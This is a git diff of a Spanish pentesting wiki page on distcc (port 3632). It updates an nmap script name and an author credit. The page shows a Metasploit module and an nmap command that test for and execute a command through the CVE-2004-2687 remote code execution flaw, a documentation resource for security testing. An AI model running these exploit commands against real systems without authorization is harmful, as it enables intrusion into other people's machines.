diff --git a/network-services-pentesting/3632-pentesting-distcc.md b/network-services-pentesting/3632-pentesting-distcc.md index f3c9afdf3..2ce9afa2c 100644 --- a/network-services-pentesting/3632-pentesting-distcc.md +++ b/network-services-pentesting/3632-pentesting-distcc.md @@ -27,7 +27,7 @@ PORT STATE SERVICE Verificar si es vulnerable a **CVE-2004-2687** para ejecutar código arbitrario: ```bash msf5 > use exploit/unix/misc/distcc_exec -nmap -p 3632 --script distcc-exec --script-args="distcc-exec.cmd='id'" +nmap -p 3632 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'" ``` # Shodan @@ -38,7 +38,7 @@ _No creo que Shodan detecte este servicio._ * [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec) * [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855) -Publicado por **Álex B (@r1p)** +Post creado por **Álex B (@r1p)**